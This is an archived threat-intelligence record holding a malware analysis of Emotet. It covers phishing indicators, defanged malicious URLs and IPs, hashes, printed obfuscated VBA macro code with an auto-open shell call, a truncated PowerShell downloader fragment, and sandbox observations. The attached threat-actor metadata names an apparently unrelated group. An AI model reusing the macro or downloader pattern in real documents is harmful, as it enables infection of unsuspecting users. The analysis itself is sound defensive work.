{
	"id": "8d9fa39c-b7b8-47c3-b1b3-d8765824eaa0",
	"created_at": "2026-04-06T01:29:14.066232Z",
	"updated_at": "2026-04-10T13:11:26.646513Z",
	"deleted_at": null,
	"sha1_hash": "9a95051404fb6a7b619c6b2201572ec840f134d4",
	"title": "Comprehensive Analysis of EMOTET Malware: Part 1 by Zyad Elzyat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4175287,
	"plain_text": "Comprehensive Analysis of EMOTET Malware: Part 1 by Zyad Elzyat\r\nBy Zyad Waleed Elzyat\r\nPublished: 2024-03-26 · Archived: 2026-04-06 01:16:35 UTC\r\nExecutive Summary\r\nEmotet, a notorious name in the realm of cyber threats, has loomed large over the digital landscape since its inception in 2014. Originally identified as a banking Trojan focused on financial data theft, Emotet has evolved into a highly adaptable and multifaceted malware, capable of causing widespread disruption to individuals and organizations alike.\r\nIn this comprehensive analysis, we embark on a journey into the intricate workings of Emotet, meticulously dissecting its tactics, functionalities, and the imminent dangers it presents.\r\nThis initial segment of our analysis serves as a roadmap, outlining the key areas of exploration:\r\n1. Email Phishing Analysis: Delving into Emotet’s deceptive strategies deployed through phishing campaigns, we scrutinize the emails crafted to entice unwitting victims, laying bare the intricacies of its social engineering tactics.\r\n2. Document Static and Dynamic Analysis: Employing a dual-pronged approach, we conduct static and dynamic analyses of the malicious documents disseminated by Emotet. Through static analysis, we uncover insights into its structural components, while dynamic analysis reveals its behavior within controlled environments, offering invaluable insights into its modus operandi.\r\n3. Malware Basic Static Analysis: Shifting our focus to the heart of Emotet, we meticulously dissect its code through static analysis techniques. This meticulous examination unveils its inner workings, shedding light on its functionalities and potential vulnerabilities.\r\n4. 
Malware Dynamic Analysis: To gain a deeper understanding of Emotet’s real-world impact, we subject it to dynamic analysis. By observing its interactions with the system and network within a simulated environment, we glean insights into its operational behavior and tactics.\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 1 of 19\r\nIndex:\r\n1. Email Phishing Analysis\r\n2. Document Static Analysis\r\n3. Document Dynamic Analysis\r\n4. Malware Basic Static Analysis\r\n5. Malware Dynamic Analysis\r\nMITRE ATT&CK for Emotet\r\nEmail Analysis\r\nEmotet primarily spreads through phishing emails. These emails often appear legitimate, containing familiar branding and enticing subjects like invoices, payment details, or shipping notifications. Clicking malicious attachments or links within these emails can infect a device with Emotet.\r\nThe email contains:\r\nThree URLs:\r\nsara[.]buller@ottumwaschools[.]com (email address)\r\nmanagement@bavarianmotorcars[.]com (email address)\r\nhxxp[://]bengalcore[.]com/Invoice-26396-reminder/ (link)\r\nTwo invoices mentioned\r\nExplanation:\r\nInvoice Email: An invoice email is a standard communication between a business and a customer. 
It details the products or services provided, along with the amount owed.\r\nThe presence of an invoice email suggests a business transaction.\r\nThe email addresses (sara[.]buller@ottumwaschools[.]com and management@bavarianmotorcars[.]com) indicate communication between:\r\nOttumwa Schools (likely a school district) and someone named Sara Buller.\r\nBavarian Motorcars (presumably a car dealership) and their management team.\r\nI ran the third URL in the ANY.RUN sandbox. It appears that the error content was removed, and the URL is malicious; 4 vendors detect it.\r\n“I conducted comprehensive research, including a thorough examination of MalwareURL, VirusTotal and whois, to gather intelligence on potential threats. 
In addition, I utilized scanning tools to analyze URLs and IP addresses, identifying Indicators of Compromise (IOCs).”\r\nNS1[.]WINHOST[.]COM\r\nNS2[.]WINHOST[.]COM\r\nNS3[.]WINHOST[.]COM\r\nhareamposi[.]com\r\nslumpdeltatime[.]com\r\nturboregale[.]com\r\nmail17[.]thesupportcenter[.]net\r\nouratlanticstore[.]com\r\nzhgrp[.]net\r\nmba269[.]net\r\nns2[.]tdigital[.]com\r\npccsh[.]org\r\nns1[.]spokaneweb[.]co\r\nkitchentoaislecatering[.]com\r\nns2[.]webmailinglists[.]com\r\nwinproteam[.]com\r\ndirteam[.]com\r\ndahtkahm[.]com\r\nbluefandago[.]com\r\ncaulfieldpreparatory[.]com\r\ndownload[.]2yourface[.]com\r\nfpbaus[.]com\r\nolaf4e[.]com\r\nsaveruralwireless[.]com\r\nloriato[.]com\r\ntravoice[.]ca\r\nconsultasas[.]com\r\nrkschmidt[.]net\r\nwebpathfinder[.]com\r\nwellbeing-center[.]com\r\nivanrivera[.]com\r\nfotonovelty[.]com\r\nroundtableusa[.]com\r\nrentwithconfidence[.]com\r\nwww[.]ultradevelopers[.]net\r\nultradevelopers[.]net\r\nworkspacellc[.]com\r\nrajib-bahar[.]com\r\nacsconnection[.]com\r\naeobinvesting[.]com\r\n164[.]155[.]169[.]37\r\n47[.]242[.]15[.]1\r\n209[.]99[.]64[.]18\r\n47[.]91[.]17[.]82\r\n47[.]52[.]230[.]230\r\n47[.]240[.]50[.]198\r\n47[.]90[.]10[.]49\r\n47[.]56[.]93[.]201\r\n47[.]91[.]138[.]163\r\n47[.]75[.]34[.]121\r\n107[.]167[.]2[.]226\r\n64[.]79[.]170[.]62\r\n89[.]187[.]101[.]92\r\n107[.]167[.]2[.]226\r\n72[.]20[.]39[.]182\r\n216[.]52[.]229[.]6\r\n182[.]16[.]102[.]91\r\n72[.]3[.]168[.]32\r\nMSDOC Analysis\r\nmd5: 02E3887DB869113CB223D9EBD9C6117F\r\nsha1: 6C43C961756DBCFFCE0E26E09F97DE6775B217ED\r\nsha256: E77FF24EA71560FFCB9B6E63E9920787D858865BA09F5D63A7E44CB86A569A6E\r\nI ran the MS doc with olevba and oleid and found it malicious and containing obfuscated VBA code:\r\nSub FMGAn24cV()\r\n On Error Resume Next\r\n Select Case cFmIw\r\n Case 8059\r\n wUhL25 = 2636\r\n GpzXy = Jlzd789p\r\n UWiZ = 482\r\n Case 6364\r\n HfiuK0K8 = XiLc\r\n shtE = Round(RQUnj832I + ChrB(tGjztO8))\r\n huYs7195 = Int(252065587 * 127 * 204048515 + CLng(IBL))\r\n Case 46\r\n IKWt3M788 = Fix(cTuwVw8 * CByte(BLux6x4G / Tan(29285969)) * 709 * zDNle7)\r\n YwAYF = odu\r\n CZk = CStr(278725002)\r\n End Select\r\n Set xjQY96L = 3\r\nEnd Sub\r\n Sub vgYJ(kHiis167)\r\n On Error Resume Next\r\n Dim jfjyp146z()\r\n ReDim jfjyp146z(2)\r\n jfjyp146z(0) = 441\r\n jfjyp146z(1) = 14\r\n yYzpN2 = (GMOz7Gjx / CDate(XIsh) * XKEimT1 + 7391 * (9 - CStr(15 * CStr(1)) * 204179029 / Round(SI\r\nsVS = tRTKlgHp - 147619628\r\nEnd Sub\r\nSub autoopen()\r\nukWWdsK\r\nEnd Sub\r\nSub FHjEj(LAcQVZ87)\r\n On Error Resume Next\r\n Do\r\n Dim lJeuDE96, nqrjpo6\r\n neGow086 = 4163\r\n AkQCgA = 294325181 - 51502176\r\n Loop Until bwvS69z8z \u003e= 13\r\n Do While JKyP8pxto Eqv 10\r\n For Each ZJyu In NBZq5Y\r\n oYwx = UlaI61M1 / fph * 498373131 / vrGbz * (86 * CDate(4003) * (93 + Int(Lyrs) / 28188549 -\r\n Next\r\n Set vRSb9W = 3\r\n Select Case tJBR\r\n Case 407850943\r\n jaum6Cn = ChrB(3641 * Hex(EzHUi2E))\r\n NCskA = CjuvT\r\n rSZ = CBool(Act)\r\n Case 1\r\n crvr = 368\r\n xgQY = ocXUh23\r\n QXvYq42qV = xzak9Z2\r\n Case 513122720\r\n vLZp = ChrB(233198461)\r\n eObu66H03 = 8\r\n vxQ = 385391781\r\n End Select\r\n Set ZWbLW1X89 = DzyG\r\n Loop\r\nEnd Sub\r\n Sub sSYfU0(SpsW4rP)\r\n On Error Resume Next\r\n XtaW 
= 252633654 - Rnd(JHd / Chr(RzwyI3)) * 582 - CSng(67 / 61 + UuzY46cs5 - CStr(404047675)) / 67\r\n YSuN0x5D = 229040495 / 36292429\r\n zFcxbS = (8 / CStr(UEi) + (ZRhr + jKDn0 - 14 / GDs * (EYA * CSng(345020765 * bQZ) - SsI / Cos(uAwx\r\nEnd Sub\r\nPublic Function ukWWdsK()\r\nOn Error Resume Next\r\nVBA.Shell$ \"\" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVS\r\nEnd Function\r\nSub JMQObR0()\r\n On Error Resume Next\r\n Lphmp5 = MDxY8q2 * uvPIG51Hm\r\n Uvcq = 314659417 * 465999738\r\nEnd Sub\r\n Sub wXFp7reR9()\r\n On Error Resume Next\r\n Do While kcJf \u003e lkPIt4\r\n For Each GIyl In OvCk\r\n PLPbA5 = Cos(188802468)\r\n Next\r\n For Each MqSKJ6f In ORvWe4F5\r\n noUx84A = 598\r\n Next\r\n For qiUPL4Ycs = cinf02 To DJpsd633\r\n FcHCQ5Ol = 531668891 * Chr(tWAv7fc2 / 401 - oOnx * Hex(22 + Log(238889098))) * yqAGY + Atn(U\r\n Next\r\n Do\r\n cgXl1L = PVFdrkie * Int(7) * ZPWvW0 / Cos(6789) - 9 + Tnbf086\r\n Loop Until xbKi8920 \u003e 6\r\n EFRQ1 = 334953148 * wLRi7\r\n Loop\r\n RSFC2F12 = mcgVq3X - 251107387\r\nEnd Sub\r\nI will enable editing in the file and run FakeNet-NG and Process Explorer to monitor connections and new processes triggered by enabling the macros.\r\nI’ve identified five IP addresses that the malware attempts to communicate with; I will scan each one.\r\nI’ve encountered obfuscated PowerShell code within the document. 
To decrypt it, I’ll utilize CyberChef and the Power Decoder tool.\r\n$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random =\r\nhxxp[://]focalaudiodesign[.]com/hl/\r\nhxxp[://]furstens[.]se/sdxCegqHa/\r\nhxxp[://]firstreport[.]com/vsIFKF/\r\nhxxp[://]sarahbradley[.]com/WVfJHSF/\r\nhxxp[://]belongings[.]com/lQelF/\r\nhxxp[://]www[.]sarahbradley[.]com/WVfJHSF/\r\nhxxps[://]www[.]firstreport[.]com/vsIFKF/\r\n173[.]254[.]14[.]237\r\n66[.]147[.]242[.]93\r\n107[.]154[.]147[.]22\r\n45[.]60[.]97[.]22\r\n89[.]221[.]250[.]20\r\n96[.]45[.]82[.]126\r\n96[.]45[.]83[.]51\r\n96[.]45[.]83[.]150\r\n96[.]45[.]82[.]249\r\n192[.]155[.]244[.]20\r\n216[.]117[.]140[.]21\r\n213[.]146[.]173[.]149\r\n213[.]146[.]173[.]150\r\n64[.]41[.]86[.]47\r\n208[.]91[.]197[.]27\r\n64[.]41[.]87[.]41\r\n64[.]41[.]94[.]112\r\n64[.]26[.]26[.]113\r\n64[.]41[.]86[.]47\r\n208[.]91[.]197[.]27\r\n64[.]41[.]87[.]41\r\n64[.]41[.]94[.]112\r\n64[.]26[.]26[.]113\r\n207[.]204[.]50[.]27\r\nBasic Static Analysis\r\nmd5: D09A466039FFE16E231A202BD6259DB8\r\nsha1: A625728EC40BD353B79913BED4DEE0C297467D3D\r\nsha256: 591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7\r\nThese URLs are related to this hash:\r\nhxxp[://]24[.]45[.]195[.]162:8443/enabled/health/\r\nhxxp[://]80[.]11[.]163[.]139:443/sess/\r\nhxxp[://]24[.]45[.]195[.]162:7080/xian/attrib/sess/merge/\r\nhxxp[://]201[.]184[.]105[.]242:443/symbols/publish/\r\nhxxp[://]133[.]167[.]80[.]63:7080/tpt/between/sess/\r\nhxxp[://]94[.]192[.]225[.]46/codec/enabled/\r\nhxxp[://]198[.]199[.]114[.]69:8080/between/pdf/sess/\r\nhxxp[://]80[.]79[.]23[.]144:443/psec/attrib/\r\nfile-size: 58880 bytes\r\nentropy: 6.805 [Packed]\r\nfile-type: executable\r\ncpu: 32-bit\r\nsubsystem: GUI\r\ncompiler-stamp: Mon Sep 30 18:18:17 2019 | UTC\r\nDIE also indicates high entropy, confirming suspicions that the file is packed.\r\nI found a section named .CRT. “The functions referenced in the .CRT section are usually written in C or C++ and are marked with specific compiler directives or attributes to ensure they are executed at the appropriate time during program startup or initialization.”\r\nBasic Dynamic Analysis\r\nWhen running the sample, a new program pops up, which seems like a copy of the original malware. This suggests that the malware is making copies of itself.\r\nsha256: 591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7\r\n“C:\\Windows\\SysWOW64\\shlphans.exe”\r\nCommand line: “ — 92fb5849”\r\nEvent, \\BaseNamedObjects\\E689B0777 “refers to an event object in the Windows operating system. 
Event objects are synchronization primitives used by programs to coordinate activities between different processes or threads.”\r\nMutant, \\BaseNamedObjects\\M689B0777 “Makes sure the malware runs only once on the machine”\r\nSection, \\BaseNamedObjects\\F932B6C7-3A20-46A0-B8A0-8894AA421973\r\nAdding a random value to a registry key “HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475”\r\nConclusion\r\n“In this segment of our analysis, we progressed from phishing examination to static analysis to dynamic analysis. In the upcoming phase, we’ll delve into code analysis, unpacking techniques, and the development of YARA rules. Stay tuned as we explore deeper into the malware’s workings and fortify our defenses, God willing.”\r\nReferences: Eng. Mahmoud Nour Eldin, https://tamatah.medium.com/emotet-malware-analysis-from-email-phishing-to-code-analysis-3fae2195ebce\r\nSource: https://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0"
	],
	"report_names": [
		"comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438954,
	"ts_updated_at": 1775826686,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a95051404fb6a7b619c6b2201572ec840f134d4.pdf",
		"text": "https://archive.orkl.eu/9a95051404fb6a7b619c6b2201572ec840f134d4.txt",
		"img": "https://archive.orkl.eu/9a95051404fb6a7b619c6b2201572ec840f134d4.jpg"
	}
}